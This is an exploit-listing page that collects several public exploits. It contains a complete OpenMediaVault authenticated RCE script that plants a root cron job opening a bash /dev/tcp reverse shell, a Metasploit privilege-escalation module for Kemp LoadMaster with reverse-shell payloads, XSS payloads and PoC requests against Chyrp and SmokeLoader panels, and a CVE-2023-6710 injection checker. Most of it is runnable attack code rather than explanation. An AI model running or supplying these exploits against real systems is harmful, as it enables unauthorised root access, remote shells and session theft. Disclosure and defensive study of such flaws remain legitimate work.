Latest exploits :: CodePwn

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024 Original source: https://malvuln.com/advisory/2337b9a12ecf50b94fc95e6ac34b3ecc.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.AsyncRat Vulnerability: Arbitrary Code Execution Description: The malware looks for and executes a x32-bit "CRYPTSP.dll" PE file in its current directory. Therefore, we can hijack the DLL and execute our own code to intercept and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Leverage RansomLord v3 for DLL generation, while written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try an exploit other types of malwares. All basic tests were conducted successfully in a virtual machine environment. Family: AsyncRat Type: PE32 MD5: 2337b9a12ecf50b94fc95e6ac34b3ecc SHA256: 3c703ecb3e8c54e352ff39fadbe789bb2313f848bd69551b07bf2ed0a58744b9 Vuln ID: MVID-2024-0683 Disclosure: 05/14/2024 Exploit/PoC: 1) Download RansomLord v3 https://github.com/malvuln/RansomLord 2) Locate the x32 CRYPTSP.dll entry using the -m flag (DLL Map) 3) Use -g flag (Generate Exploit) to output an x32 DLL CRYPTSP.dll, based on an existing vulnerable malware in the victims list. 4) (Optional) -e flag to setup Windows event IOC logging in the registry, this will log the SHA256 hash, full path and filename. Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>import requests import argparse from bs4 import BeautifulSoup from urllib.parse import urlparse, parse_qs, urlencode, urlunparse from requests.exceptions import RequestException class Colors: RED = '\033[91m' GREEN = '\033[1;49;92m' RESET = '\033[0m' def get_cluster_manager_url(base_url, path): print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET) try: response = requests.get(base_url + path) response.raise_for_status() except requests.exceptions.RequestException as e: print(Colors.RED + f"Error: {e}" + Colors.RESET) return None print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET) if response.status_code == 200: print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET) # Use BeautifulSoup to parse the HTML content soup = BeautifulSoup(response.text, 'html.parser') # Find all 'a' tags with 'href' attribute all_links = soup.find_all('a', href=True) # Search for the link containing the Alias parameter in the href attribute cluster_manager_url = None for link in all_links: parsed_url = urlparse(link['href']) query_params = parse_qs(parsed_url.query) alias_value = query_params.get('Alias', [None])[0] if alias_value: print(Colors.GREEN + f"Alias value found" + Colors.RESET) cluster_manager_url = link['href'] break if cluster_manager_url: print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET) return cluster_manager_url else: print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET) return None print(Colors.RED + f"Error: Unable to get the initial step on {base_url}") return None def update_alias_value(url): parsed_url = urlparse(url) query_params = parse_qs(parsed_url.query, keep_blank_values=True) query_params['Alias'] = ["<DedSec-47>"] updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True))) print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET) return updated_url def check_response_for_value(url, check_value): response = requests.get(url) if check_value in response.text: print(Colors.RED + "Website is vulnerable POC by :") print(Colors.GREEN + """ ____ _ ____ _ _ _____ | _ \ ___ __| / ___| ___ ___ | || |___ | | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / / | |_| | __/ (_| |___) | __/ (_ |____|__ | / / |____/ \___|\__,_|____/ \___|\___| |_|/_/ github.com/DedSec-47 """) else: print(Colors.GREEN + "Website is not vulnerable POC by :") print(Colors.GREEN + """ ____ _ ____ _ _ _____ | _ \ ___ __| / ___| ___ ___ | || |___ | | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / / | |_| | __/ (_| |___) | __/ (_ |____|__ | / / |____/ \___|\__,_|____/ \___|\___| |_|/_/ github.com/DedSec-47 """) def main(): # Create a command-line argument parser parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager") # Add a command-line argument for the target (-t/--target) parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True) # Add a command-line argument for the URL path (-u/--url) parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True) # Parse the command-line arguments args = parser.parse_args() # Get the cluster manager URL from the specified website cluster_manager_url = get_cluster_manager_url(args.target, args.url) # Check if the cluster manager URL is found if cluster_manager_url: # Modify the URL by adding the cluster manager value modified_url = args.target + cluster_manager_url modified_url = update_alias_value(args.target + cluster_manager_url) print(Colors.GREEN + "Check executed successfully" + Colors.RESET) # Check the response for the value "<DedSec-47>" check_response_for_value(modified_url, "<DedSec-47>") if __name__ == "__main__": main() </code></pre>

<pre><code># Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS) # Date: 2024-04-24 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://github.com/chyrp/ # Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip # Version: 2.5.2 # Tested on: MacOS ### Steps to Reproduce ### - Login from the address: http://localhost/chyrp/?action=login. - Click on 'Write'. - Type this payload into the 'Title' field: "><img src=x onerror=alert( "Stored")> - Fill in the 'Body' area and click 'Publish'. - An alert message saying "Stored" will appear in front of you. ### PoC Request ### POST /chyrp/admin/?action=add_post HTTP/1.1 Host: localhost Cookie: ChyrpSession=c4194c16a28dec03e449171087981d11; show_more_options=true User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp, */*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------28307567523233313132815561598 Content-Length: 1194 Origin: http://localhost Referer: http://localhost/chyrp/admin/?action=write_post Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="title" "><img src=x onerror=alert("Stored")> -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="body" 1337 -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="status" public -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="slug" -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="created_at" 04/24/24 12:31:57 -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="original_time" 04/24/24 12:31:57 -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="trackbacks" -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="feather" text -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="hash" 11e11aba15114f918ec1c2e6b8f8ddcf -----------------------------28307567523233313132815561598-- </code></pre>

<pre><code># This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Post::File prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Kemp LoadMaster Local sudo privilege escalation', 'Description' => %q{ This module abuses a feature of the sudo command on Progress Kemp LoadMaster. Certain binary files are allowed to automatically elevate with the sudo command. This is based off of the file name. Some files have this permission are not write-protected from the default 'bal' user. As such, if the file is overwritten with an arbitrary file, it will still auto-elevate. This module overwrites the /bin/loadkeys file with another executable. }, 'Author' => [ 'Dave Yesland with Rhino Security Labs', 'bwatters-r7' # module, ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'], ['URL', 'https://kemptechnologies.com/kemp-load-balancers'] ], 'DisclosureDate' => '2024-03-19', 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK], 'Reliability' => [ REPEATABLE_SESSION ] }, 'SessionTypes' => ['shell', 'meterpreter'], 'Platform' => ['unix', 'linux'], 'Targets' => [ [ 'Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :dropper, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' } } ], [ 'Command', { 'Arch' => [ARCH_CMD], 'Type' => :command, 'Payload' => { 'BadChars' => "\x27", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic gawk telnet ssh echo' } }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' } } ] ], 'Privileged' => true ) ) register_options([ OptString.new('TARGET_BINARY', [true, 'The path for a binary file that has permission to auto-elevate.', '/bin/loadkeys']), OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]) ]) end def check score = 0 score += 1 if read_file('/usr/wui/index.js').include?('KEMP') score += 1 if read_file('/etc/motd').include?('Kemp LoadMaster') score += 1 if exists?('/usr/wui/eula.kemp.html') vprint_status("Found #{score} indicators this is a KEMP product") return CheckCode::Detected if score > 0 return CheckCode::Safe end def verify_copy(src, dest, elevate) orig_file_hash = file_remote_digestmd5(src) vprint_status("Moving #{src} to #{dest}") if elevate output = cmd_exec("sudo /bin/cp '#{src}' '#{dest}'") else output = cmd_exec("/bin/cp '#{src}' '#{dest}'") end return true if file_remote_digestmd5(dest) == orig_file_hash print_bad("Copy failed - #{output}") false end def execute_dropper(target_binary, binary_rename, temp_payload_path) vprint_status("Writing payload to #{temp_payload_path}") write_file(temp_payload_path, generate_payload_exe) chmod(temp_payload_path) register_file_for_cleanup(temp_payload_path) return unless verify_copy(target_binary, binary_rename, false) return unless verify_copy(temp_payload_path, target_binary, true) vprint_status("Running #{target_binary}") cmd_exec("sudo '#{target_binary}'") end def execute_command(target_binary, binary_rename, cmd) vprint_status('Preparing payload command') # save copy of target_binary return unless verify_copy(target_binary, binary_rename, false) return unless verify_copy('/bin/bash', target_binary, true) vprint_status('Running payload command') vprint_status(cmd_exec("sudo #{target_binary} -c '#{cmd}'")) end def exploit writable_dir = datastore['WRITABLE_DIR'] if writable_dir.blank? || (writable_dir[-1] != '/') writable_dir += '/' end fail_with(Failure::BadConfig, "Invalid WRITABLE_DIR: #{writable_dir}") unless directory?(writable_dir) target_binary = datastore['TARGET_BINARY'] binary_rename = writable_dir + ".#{Rex::Text.rand_text_alpha_lower(6..12)}" target_binary_hash = file_remote_digestmd5(target_binary) begin case target['Type'] when :dropper temp_payload = writable_dir + ".#{Rex::Text.rand_text_alpha_lower(6..12)}" execute_dropper(target_binary, binary_rename, temp_payload) when :command execute_command(target_binary, binary_rename, payload.encoded) end ensure unless target_binary_hash == file_remote_digestmd5(target_binary) cmd_exec("sudo rm '#{target_binary}'") verify_copy(binary_rename, target_binary, true) cmd_exec("sudo rm '#{binary_rename}'") end end if target_binary_hash == file_remote_digestmd5(target_binary) print_good("#{target_binary} returned to original contents") else print_bad("#{target_binary} was not returned to original contents") end end end </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024 Original source: https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f_B.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Panel.SmokeLoader Vulnerability: Cross Site Request Forgery (CSRF) - Persistent XSS Family: SmokeLoader Type: Web Panel MD5: 4b5fc3a2489985f314b81d35eac3560f (control.php) SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743 Vuln ID: MVID-2024-0682 Disclosure: The smokebot admin web panel is written in PHP for remote administration capability. The panel has multiple features like Bot List, Task List, Stealer, Miner, Email Grab, KeyLogger etc. The "control.php" PHP page contains an HTML FORM using POST method, however there is no CSRF security token used by the FORM. This is a unique token per session within the FORM, used as a challenge to the server to help prevent cross-site-scripting attacks. Therefore, third-party adversaries who can lure a panel user to visit an attacker controlled webpage or click an infected link may result in the panel users submitting FORMS on an attackers behalf. This may result in code execution, data theft, GEO location disclosure. The CSRF to XSS results in stored JS payload in the smoke MySQL database table "plugins". hash fgfilter fakedns_rules filesearch_rules procmon_rules ddos_rules keylog_rules fgcookies miner_rules 93666df0833e0b63917e5373812613 0 ""/%3E%3Cscript%3Ewindow.open("https://www.malvuln.com/l... Exploit/PoC: 1) CSRF to add your own Miner Pool %3Cform method="post" action="http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner"%3E Pool: %3Cinput type="input" name="miner_pool" size="30" value="MyPoolFool:666"%3E Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3E Password: %3Cinput type="input" name="miner_pass" size="20" value="malvuln"%3E %3Cinput type="hidden" name="mode" value="miner"%3E %3Cinput type="submit" value="SAVE"%3E %3Cscript%3Edocument.forms[0].submit()%3C/script%3E %3C/form%3E 2) CSRF to Persistent XSS %3Cform method="post" action="http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner"%3E Pool: %3Cinput type="input" name="miner_pool" size="300" value='""/%3E%3Cscript%3Ewindow.open("https://www.malvuln.com/log.php")%3C/script%3E"'%3E Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3E Password: %3Cinput type="input" name="miner_pass" size="20" value="malvuln"%3E %3Cinput type="hidden" name="mode" value="miner"%3E %3Cinput type="submit" value="SAVE"%3E %3Cscript%3Edocument.forms[0].submit()%3C/script%3E %3C/form%3E Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024 Original source: https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Panel.SmokeLoader Vulnerability: Cross Site Scripting (XSS) Family: SmokeLoader Type: Web Panel MD5: 4b5fc3a2489985f314b81d35eac3560f (control.php) SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743 Vuln ID: MVID-2024-0681 Disclosure: 05/11/2024 Description: The smokebot admin web panel is written in PHP for remote administration capability. The panel has multiple features like Bot List, Task List, Stealer, Miner, Email Grab, KeyLogger etc. The "control.php" PHP page contains an HTML FORM that uses $_SERVER["PHP_SELF"] for the form action method. This is a super global variable that returns the filename of the currently executing script. There is no secure coding practices of filtering input or sanitization of output e.g "htmlspecialchars()". Therefore, panel users who visit a third-party adversary website or click an infected link, can trigger arbitrary client side JS code execution in the security context of the current user. This can result in data theft or GEO location disclosure of the user accessing the smokebot web interface. PHP snippet. if ($_GET["mode"] === "reports"){ $url_pattern = $_GET["logs_sru"]; $id_pattern = $_GET["logs_sri"]; $action = $_SERVER["PHP_SELF"]."?page=stealer&mode=reports"; %3Cform method=\"get\" action=\"{$action}\"%3E Interestingly, they use PHP function htmlspecialchars() when retrieving data from the "smoke bot" MySQL database. $r = mysqli_query($dbcon,"SELECT * FROM `stealer` WHERE `cname`='{$id}'"); while ($v = mysqli_fetch_assoc($r)){ $stealer_host = htmlspecialchars($v["host"]); However, it doesn't wrap $_SERVER["PHP_SELF"] on the action method for the FORM {$action} variable that handles user input. Exploit/PoC: 1) http://x.x.x.x/SmokeLoader/control1.php?page=stealer&mode=reports&logs_sri=%22/%3E%3Cscript%3Ewindow.open("https://malvuln.com")%3C/script%3E&logs_sru=&next=1 2) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_sri=%22/%3E%3Cscript%3Ealert((document.cookie)%3C/script%3E 3) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_sru=%22/%3E%3Cscript%3Ewindow.open('https://hyp3rlinx.altervista.org/')%3C/script%3E 4) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_srd=%22/%3E%3Cscript%3Ealert(%22malvuln%22)%3C/script%3E Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code># Exploit Title: Openmediavault < 7.0.32 Authenticated RCE & Local Privilege Escalation # Date: 08.05.2024 # Exploit Author: Mert BENADAM # Vendor Homepage: https://www.openmediavault.org/ # Software Link: https://sourceforge.net/projects/openmediavault/ # Version: < 7.0.32 # Tested on: OMV 7.0.32 & 6.5 @Virtual Machine # Description: OpenMediaVault is the next generation network attached storage (NAS) solution based on Debian Linux. # Special Thx: k3yZ :) """ PoC: This vulnerability occurs when users in the web-admin group enter commands on the crontab by selecting the root shell. As a result of exploiting the vulnerability,authenticated web-admin users can run commands with root privileges and receive reverse shell connections. It can also be used in privilege escalation attacks on local systems. """ import argparse import requests import json def login(ip_address, username, password, lhost, lport): try: login_data = { "service": "Session", "method": "login", "params": { "username": username, "password": password }, "options": None } url = f"http://{ip_address}/rpc.php" response = requests.post(url, json=login_data) if response.status_code == 200: print("Login Success , Checking User Privilages...") post_check(ip_address, response.cookies, lhost , lport) else: print("login Failed, Probably Wrong User Credentials...") print("Reason:") print(response.json()) except requests.exceptions.ConnectionError: print("Connection Error: Could Not Connect To The Server...") except Exception as e: print("Unexpected Error:", e) def post_check(ip_address, cookies, lhost, lport): try: post_data = { "service": "Cron", "method": "getList", "params": { "type": ["userdefined"], "start": 0, "limit": -1 }, "options": None } url = f"http://{ip_address}/rpc.php" response = requests.post(url, json=post_data, cookies=cookies) if response.status_code == 200: print("Accesing Crons...OK") send_post(ip_address, cookies, lhost , lport) elif response.status_code == 403: print("Kullanıcı yetkili değil.") else: print("Post Request Failure...") except requests.exceptions.ConnectionError: print("Connection Error: Could Not Connect To The Server...") except Exception as e: print("Beklenmeyen bir hata oluştu:", e) def send_post(ip_address, cookies, lhost , lport): try: post_data = { "service": "Cron", "method": "set", "params": { "uuid": "fa4b1c66-ef79-11e5-87a0-0002b3a176b4", # UUID "enable": True, "execution": "exactly", "minute": ["*"], "everynminute": False, "hour": ["*"], "everynhour": False, "dayofmonth": ["*"], "everyndayofmonth": False, "month": ["*"], "dayofweek": ["*"], "username": "root", "command": f"bash -c 'exec bash -i &>/dev/tcp/{lhost}/{lport} <&1'", # Command From User "sendemail": False, "comment": "", "type": "userdefined" }, "options": None } url = f"http://{ip_address}/rpc.php" response = requests.post(url, json=post_data, cookies=cookies) if response.status_code == 200: print("Payload Sent... OK,") update(ip_address, cookies) elif response.status_code == 403: print("User Not Authrorized.") else: print("Something Wrong.CHECK your version...") except requests.exceptions.ConnectionError: print("Connection Error: Could Not Connect To The Server...") except Exception as e: print("Unexpected Error:", e) def update(ip_address, cookies): try: post_data = { "service": "Config", "method": "applyChangesBg", "params": { "modules": [], "force": False }, "options": None } url = f"http://{ip_address}/rpc.php" response = requests.post(url, json=post_data, cookies=cookies) if response.status_code == 200: print("Updating crontabs...") print("Successfully Exploited...") print("Exploited Shell Will Be Triggered In 1 Minute, Check Your Listener...") print("Warning: Make sure You Open a listener And Enter Correct IP-PORT Information...") elif response.status_code == 403: print("User Not Authrorized.") else: print("Someting Wrong. Check version...") except requests.exceptions.ConnectionError: print("Connection Error: Could Not Connect To The Server...") except Exception as e: print("Unexpected Error:", e) def main(): font=""" ███╗ ██╗ ██████╗ ███╗ ███╗███████╗██████╗ ██████╗██╗ ██╗ ██████╗ ██████╗ ████╗ ██║██╔═══██╗████╗ ████║██╔════╝██╔══██╗██╔════╝╚██╗ ██╔╝██╔═████╗██╔═████╗ ██╔██╗ ██║██║ ██║██╔████╔██║█████╗ ██████╔╝██║ ╚████╔╝ ██║██╔██║██║██╔██║ ██║╚██╗██║██║ ██║██║╚██╔╝██║██╔══╝ ██╔══██╗██║ ╚██╔╝ ████╔╝██║████╔╝██║ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║███████╗██║ ██║╚██████╗ ██║ ╚██████╔╝╚██████╔╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═════╝ """ parser = argparse.ArgumentParser(description="OpenMediaVault 7.0.32 > 6.5.0 RCE And Local Privilage Escalation") parser.add_argument("-U", "--ip", type=str, help="Victim Ip Adress", required=False) parser.add_argument("-u", "--username", type=str, help="Username For Web Admin", required=False) parser.add_argument("-p", "--password", type=str, help="Password For Web Admin", required=False) parser.add_argument("-L", "--lhost", type=str, help="Listener IP Adress For Reverse Shell", required=False) parser.add_argument("-P", "--lport", type=str, help="Listener Port For Reverse Shell", required=False) args = parser.parse_args() if args.ip and args.username and args.password and args.lhost and args.lport: print(font) login(args.ip, args.username, args.password, args.lhost , args.lport) else: print(font) parser.print_help() if __name__ == "__main__": main() </code></pre>